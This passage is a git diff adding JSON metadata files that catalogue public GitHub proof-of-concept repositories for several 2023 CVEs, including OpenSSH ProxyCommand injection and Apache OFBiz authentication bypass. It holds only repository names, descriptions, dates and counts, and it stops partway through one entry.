+ "full_name": "geraldoalcantara\/CVE-2023-51281",
+ "owner": {
+ "login": "geraldoalcantara",
+ "id": 152064551,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4",
+ "html_url": "https:\/\/github.com\/geraldoalcantara"
+ },
+ "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51281",
+ "description": "Multiple cross-site scripting (XSS) vulnerabilities in \/customer_support\/ajax.php?action=save_customer in Customer Support System 1.0 allow authenticated attackers to execute to execute arbitrary web scripts or HTML via a crafted payload injected into the “firstname”, \"lastname\", \"middlename\", \"contact\" or “address” parameters.",
+ "fork": false,
+ "created_at": "2023-12-22T15:51:43Z",
+ "updated_at": "2023-12-22T16:08:00Z",
+ "pushed_at": "2023-12-22T16:07:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51385.json b/2023/CVE-2023-51385.json
new file mode 100644
index 0000000000..d39677b52d
--- /dev/null
+++ b/2023/CVE-2023-51385.json
@@ -0,0 +1,602 @@
+[
+ {
+ "id": 697796057,
+ "name": "poc-proxycommand-vulnerable",
+ "full_name": "vin01\/poc-proxycommand-vulnerable",
+ "owner": {
+ "login": "vin01",
+ "id": 30344579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30344579?v=4",
+ "html_url": "https:\/\/github.com\/vin01"
+ },
+ "html_url": "https:\/\/github.com\/vin01\/poc-proxycommand-vulnerable",
+ "description": "Proof of conept to exploit vulnerable proxycommand configurations on ssh clients (CVE-2023-51385)",
+ "fork": false,
+ "created_at": "2023-09-28T13:48:17Z",
+ "updated_at": "2024-06-06T06:52:53Z",
+ "pushed_at": "2023-10-12T19:06:26Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 36,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 36,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735476980,
+ "name": "CVE-2023-51385",
+ "full_name": "FeatherStark\/CVE-2023-51385",
+ "owner": {
+ "login": "FeatherStark",
+ "id": 42148584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4",
+ "html_url": "https:\/\/github.com\/FeatherStark"
+ },
+ "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-25T04:34:02Z",
+ "updated_at": "2023-12-25T04:34:02Z",
+ "pushed_at": "2023-12-25T04:35:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735514578,
+ "name": "poc-cve-2023-51385",
+ "full_name": "watarium\/poc-cve-2023-51385",
+ "owner": {
+ "login": "watarium",
+ "id": 30005626,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30005626?v=4",
+ "html_url": "https:\/\/github.com\/watarium"
+ },
+ "html_url": "https:\/\/github.com\/watarium\/poc-cve-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-25T07:43:29Z",
+ "updated_at": "2023-12-25T07:43:29Z",
+ "pushed_at": "2023-12-27T02:31:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735584620,
+ "name": "CVE-2023-51385",
+ "full_name": "Le1a\/CVE-2023-51385",
+ "owner": {
+ "login": "Le1a",
+ "id": 97610822,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4",
+ "html_url": "https:\/\/github.com\/Le1a"
+ },
+ "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-51385",
+ "description": "OpenSSH ProxyCommand RCE",
+ "fork": false,
+ "created_at": "2023-12-25T12:51:05Z",
+ "updated_at": "2024-03-07T00:13:03Z",
+ "pushed_at": "2023-12-26T07:43:32Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735589944,
+ "name": "CVE-2023-51385_test",
+ "full_name": "LtmThink\/CVE-2023-51385_test",
+ "owner": {
+ "login": "LtmThink",
+ "id": 110249505,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110249505?v=4",
+ "html_url": "https:\/\/github.com\/LtmThink"
+ },
+ "html_url": "https:\/\/github.com\/LtmThink\/CVE-2023-51385_test",
+ "description": "一个验证对CVE-2023-51385",
+ "fork": false,
+ "created_at": "2023-12-25T13:13:25Z",
+ "updated_at": "2024-04-15T01:18:31Z",
+ "pushed_at": "2024-03-17T08:25:35Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 735851357,
+ "name": "CVE-2023-51385_poc-test",
+ "full_name": "WLaoDuo\/CVE-2023-51385_poc-test",
+ "owner": {
+ "login": "WLaoDuo",
+ "id": 69497874,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69497874?v=4",
+ "html_url": "https:\/\/github.com\/WLaoDuo"
+ },
+ "html_url": "https:\/\/github.com\/WLaoDuo\/CVE-2023-51385_poc-test",
+ "description": "CVE-2023-51385;OpenSSH ProxyCommand RCE;OpenSSH <9.6 命令注入漏洞poc ",
+ "fork": false,
+ "created_at": "2023-12-26T09:01:02Z",
+ "updated_at": "2023-12-26T10:13:34Z",
+ "pushed_at": "2023-12-27T06:33:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 736832290,
+ "name": "CVE-2023-51385_TT",
+ "full_name": "N0rther\/CVE-2023-51385_TT",
+ "owner": {
+ "login": "N0rther",
+ "id": 57187267,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57187267?v=4",
+ "html_url": "https:\/\/github.com\/N0rther"
+ },
+ "html_url": "https:\/\/github.com\/N0rther\/CVE-2023-51385_TT",
+ "description": "CVE-2023-51385测试POC",
+ "fork": false,
+ "created_at": "2023-12-29T02:31:42Z",
+ "updated_at": "2023-12-29T02:31:42Z",
+ "pushed_at": "2023-12-29T02:33:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737146570,
+ "name": "CVE-2023-51385_test",
+ "full_name": "power1314520\/CVE-2023-51385_test",
+ "owner": {
+ "login": "power1314520",
+ "id": 37863351,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37863351?v=4",
+ "html_url": "https:\/\/github.com\/power1314520"
+ },
+ "html_url": "https:\/\/github.com\/power1314520\/CVE-2023-51385_test",
+ "description": "一个验证对CVE-2023-51385",
+ "fork": false,
+ "created_at": "2023-12-30T01:08:29Z",
+ "updated_at": "2023-12-30T01:08:29Z",
+ "pushed_at": "2023-12-30T01:13:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737934166,
+ "name": "CVE-2023-51385",
+ "full_name": "WOOOOONG\/CVE-2023-51385",
+ "owner": {
+ "login": "WOOOOONG",
+ "id": 40143329,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4",
+ "html_url": "https:\/\/github.com\/WOOOOONG"
+ },
+ "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2023-51385",
+ "description": "CVE-2023-51385 PoC Exploit ",
+ "fork": false,
+ "created_at": "2024-01-02T02:12:35Z",
+ "updated_at": "2024-01-30T01:43:22Z",
+ "pushed_at": "2024-01-02T06:48:39Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738402073,
+ "name": "CVE-2023-51385",
+ "full_name": "uccu99\/CVE-2023-51385",
+ "owner": {
+ "login": "uccu99",
+ "id": 155516921,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155516921?v=4",
+ "html_url": "https:\/\/github.com\/uccu99"
+ },
+ "html_url": "https:\/\/github.com\/uccu99\/CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-03T06:28:34Z",
+ "updated_at": "2024-01-03T06:28:35Z",
+ "pushed_at": "2024-01-03T06:28:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738661198,
+ "name": "exploit-CVE-2023-51385",
+ "full_name": "julienbrs\/exploit-CVE-2023-51385",
+ "owner": {
+ "login": "julienbrs",
+ "id": 106234742,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4",
+ "html_url": "https:\/\/github.com\/julienbrs"
+ },
+ "html_url": "https:\/\/github.com\/julienbrs\/exploit-CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-03T18:40:44Z",
+ "updated_at": "2024-01-03T18:40:44Z",
+ "pushed_at": "2024-01-03T18:41:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738669696,
+ "name": "malicious-exploit-CVE-2023-51385",
+ "full_name": "julienbrs\/malicious-exploit-CVE-2023-51385",
+ "owner": {
+ "login": "julienbrs",
+ "id": 106234742,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106234742?v=4",
+ "html_url": "https:\/\/github.com\/julienbrs"
+ },
+ "html_url": "https:\/\/github.com\/julienbrs\/malicious-exploit-CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-03T19:08:28Z",
+ "updated_at": "2024-01-03T19:08:28Z",
+ "pushed_at": "2024-01-03T20:06:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 741050517,
+ "name": "CVE-2023-51385",
+ "full_name": "Sonicrrrr\/CVE-2023-51385",
+ "owner": {
+ "login": "Sonicrrrr",
+ "id": 89630690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89630690?v=4",
+ "html_url": "https:\/\/github.com\/Sonicrrrr"
+ },
+ "html_url": "https:\/\/github.com\/Sonicrrrr\/CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-09T15:44:52Z",
+ "updated_at": "2024-01-09T15:44:52Z",
+ "pushed_at": "2024-01-09T15:57:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745786201,
+ "name": "CVE-2023-51385",
+ "full_name": "farliy-hacker\/CVE-2023-51385",
+ "owner": {
+ "login": "farliy-hacker",
+ "id": 62786635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4",
+ "html_url": "https:\/\/github.com\/farliy-hacker"
+ },
+ "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385",
+ "description": "CVE-2023-51385",
+ "fork": false,
+ "created_at": "2024-01-20T06:09:45Z",
+ "updated_at": "2024-01-20T06:09:46Z",
+ "pushed_at": "2024-01-20T06:12:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745788678,
+ "name": "CVE-2023-51385-save",
+ "full_name": "farliy-hacker\/CVE-2023-51385-save",
+ "owner": {
+ "login": "farliy-hacker",
+ "id": 62786635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4",
+ "html_url": "https:\/\/github.com\/farliy-hacker"
+ },
+ "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385-save",
+ "description": "CVE-2023-51385-save",
+ "fork": false,
+ "created_at": "2024-01-20T06:20:37Z",
+ "updated_at": "2024-01-20T06:20:38Z",
+ "pushed_at": "2024-01-20T06:21:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 750239281,
+ "name": "CVE-2023-51385",
+ "full_name": "2048JiaLi\/CVE-2023-51385",
+ "owner": {
+ "login": "2048JiaLi",
+ "id": 38320564,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38320564?v=4",
+ "html_url": "https:\/\/github.com\/2048JiaLi"
+ },
+ "html_url": "https:\/\/github.com\/2048JiaLi\/CVE-2023-51385",
+ "description": "CVE-2023-51385 的exp",
+ "fork": false,
+ "created_at": "2024-01-30T09:01:05Z",
+ "updated_at": "2024-01-30T09:02:38Z",
+ "pushed_at": "2024-01-30T09:02:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 787174802,
+ "name": "CVE-2023-51385-",
+ "full_name": "thinkliving2020\/CVE-2023-51385-",
+ "owner": {
+ "login": "thinkliving2020",
+ "id": 74002146,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74002146?v=4",
+ "html_url": "https:\/\/github.com\/thinkliving2020"
+ },
+ "html_url": "https:\/\/github.com\/thinkliving2020\/CVE-2023-51385-",
+ "description": "CVE-2023-51385 ",
+ "fork": false,
+ "created_at": "2024-04-16T03:01:03Z",
+ "updated_at": "2024-04-16T03:01:04Z",
+ "pushed_at": "2024-04-16T03:06:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806731455,
+ "name": "CVE-2023-51385",
+ "full_name": "c0deur\/CVE-2023-51385",
+ "owner": {
+ "login": "c0deur",
+ "id": 7541172,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7541172?v=4",
+ "html_url": "https:\/\/github.com\/c0deur"
+ },
+ "html_url": "https:\/\/github.com\/c0deur\/CVE-2023-51385",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-27T19:29:55Z",
+ "updated_at": "2024-05-27T20:01:39Z",
+ "pushed_at": "2024-05-27T20:01:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 814326255,
+ "name": "CVE-2023-51385_poc",
+ "full_name": "endasugrue\/CVE-2023-51385_poc",
+ "owner": {
+ "login": "endasugrue",
+ "id": 26721171,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721171?v=4",
+ "html_url": "https:\/\/github.com\/endasugrue"
+ },
+ "html_url": "https:\/\/github.com\/endasugrue\/CVE-2023-51385_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-12T19:38:42Z",
+ "updated_at": "2024-06-12T20:34:48Z",
+ "pushed_at": "2024-06-12T20:34:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 815463201,
+ "name": "CVE-2023-51385-exploit",
+ "full_name": "MiningBot-eth\/CVE-2023-51385-exploit",
+ "owner": {
+ "login": "MiningBot-eth",
+ "id": 171243902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171243902?v=4",
+ "html_url": "https:\/\/github.com\/MiningBot-eth"
+ },
+ "html_url": "https:\/\/github.com\/MiningBot-eth\/CVE-2023-51385-exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-15T08:27:46Z",
+ "updated_at": "2024-06-15T08:27:49Z",
+ "pushed_at": "2024-06-15T08:28:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51409.json b/2023/CVE-2023-51409.json
new file mode 100644
index 0000000000..bd87887d28
--- /dev/null
+++ b/2023/CVE-2023-51409.json
@@ -0,0 +1,64 @@
+[
+ {
+ "id": 761865974,
+ "name": "CVE-2023-51409",
+ "full_name": "RandomRobbieBF\/CVE-2023-51409",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-51409",
+ "description": "AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload",
+ "fork": false,
+ "created_at": "2024-02-22T16:26:57Z",
+ "updated_at": "2024-02-22T16:26:58Z",
+ "pushed_at": "2024-02-22T16:29:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 790654074,
+ "name": "CVE-2023-51409",
+ "full_name": "imhunterand\/CVE-2023-51409",
+ "owner": {
+ "login": "imhunterand",
+ "id": 109766416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109766416?v=4",
+ "html_url": "https:\/\/github.com\/imhunterand"
+ },
+ "html_url": "https:\/\/github.com\/imhunterand\/CVE-2023-51409",
+ "description": "AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload",
+ "fork": false,
+ "created_at": "2024-04-23T09:25:37Z",
+ "updated_at": "2024-04-23T09:28:10Z",
+ "pushed_at": "2024-04-23T09:27:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-51409"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-5142.json b/2023/CVE-2023-5142.json
new file mode 100644
index 0000000000..a2c215cb3e
--- /dev/null
+++ b/2023/CVE-2023-5142.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 707145538,
+ "name": "CVE-H3C-Report",
+ "full_name": "kuangxiaotu\/CVE-H3C-Report",
+ "owner": {
+ "login": "kuangxiaotu",
+ "id": 99320591,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99320591?v=4",
+ "html_url": "https:\/\/github.com\/kuangxiaotu"
+ },
+ "html_url": "https:\/\/github.com\/kuangxiaotu\/CVE-H3C-Report",
+ "description": "CVE-2023-5142",
+ "fork": false,
+ "created_at": "2023-10-19T10:09:47Z",
+ "updated_at": "2023-10-19T10:09:47Z",
+ "pushed_at": "2023-09-08T01:56:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51448.json b/2023/CVE-2023-51448.json
new file mode 100644
index 0000000000..30851ac2ab
--- /dev/null
+++ b/2023/CVE-2023-51448.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 768047429,
+ "name": "CVE-2023-51448-cacti-sqli-poc",
+ "full_name": "jakabakos\/CVE-2023-51448-cacti-sqli-poc",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-51448-cacti-sqli-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-06T11:23:11Z",
+ "updated_at": "2024-06-06T11:58:41Z",
+ "pushed_at": "2024-03-06T11:23:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-51467.json b/2023/CVE-2023-51467.json
new file mode 100644
index 0000000000..4c35043ce0
--- /dev/null
+++ b/2023/CVE-2023-51467.json
@@ -0,0 +1,266 @@
+[
+ {
+ "id": 736831199,
+ "name": "CVE-2023-51467",
+ "full_name": "JaneMandy\/CVE-2023-51467",
+ "owner": {
+ "login": "JaneMandy",
+ "id": 36792635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4",
+ "html_url": "https:\/\/github.com\/JaneMandy"
+ },
+ "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467",
+ "description": "CVE-2023-51467 POC",
+ "fork": false,
+ "created_at": "2023-12-29T02:25:43Z",
+ "updated_at": "2023-12-29T11:55:08Z",
+ "pushed_at": "2024-01-02T07:28:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737019244,
+ "name": "CVE-2023-51467",
+ "full_name": "Chocapikk\/CVE-2023-51467",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-51467",
+ "description": "Apache OfBiz Auth Bypass Scanner for CVE-2023-51467",
+ "fork": false,
+ "created_at": "2023-12-29T15:01:46Z",
+ "updated_at": "2024-04-26T05:08:58Z",
+ "pushed_at": "2023-12-31T01:23:55Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache-ofbiz",
+ "auth-bypass",
+ "bugbounty",
+ "cve-2023-51467",
+ "cybersecurity",
+ "ethical-hacking",
+ "exploit",
+ "infosec",
+ "open-source-security",
+ "patch-management",
+ "penetration-testing",
+ "security-automation",
+ "security-tools",
+ "vulnerability-detection",
+ "vulnerability-scanner"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 737064466,
+ "name": "CVE-2023-51467-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2023-51467-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-51467-EXPLOIT",
+ "description": "A PoC exploit for CVE-2023-51467 - Apache OFBiz Authentication Bypass",
+ "fork": false,
+ "created_at": "2023-12-29T17:47:54Z",
+ "updated_at": "2024-02-25T17:33:18Z",
+ "pushed_at": "2023-12-31T21:29:59Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "authentication-bypass",
+ "cve-2023-51467",
+ "poc",
+ "ssrf"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738140662,
+ "name": "Apache-OFBiz-Authentication-Bypass",
+ "full_name": "jakabakos\/Apache-OFBiz-Authentication-Bypass",
+ "owner": {
+ "login": "jakabakos",
+ "id": 42498816,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4",
+ "html_url": "https:\/\/github.com\/jakabakos"
+ },
+ "html_url": "https:\/\/github.com\/jakabakos\/Apache-OFBiz-Authentication-Bypass",
+ "description": "This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz.",
+ "fork": false,
+ "created_at": "2024-01-02T14:20:10Z",
+ "updated_at": "2024-06-23T14:32:41Z",
+ "pushed_at": "2024-03-24T18:20:52Z",
+ "stargazers_count": 72,
+ "watchers_count": 72,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 72,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 738955975,
+ "name": "Exploit_CVE-2023-51467",
+ "full_name": "Subha-BOO7\/Exploit_CVE-2023-51467",
+ "owner": {
+ "login": "Subha-BOO7",
+ "id": 141217634,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141217634?v=4",
+ "html_url": "https:\/\/github.com\/Subha-BOO7"
+ },
+ "html_url": "https:\/\/github.com\/Subha-BOO7\/Exploit_CVE-2023-51467",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-04T12:44:43Z",
+ "updated_at": "2024-01-04T12:51:15Z",
+ "pushed_at": "2024-01-04T12:45:24Z",
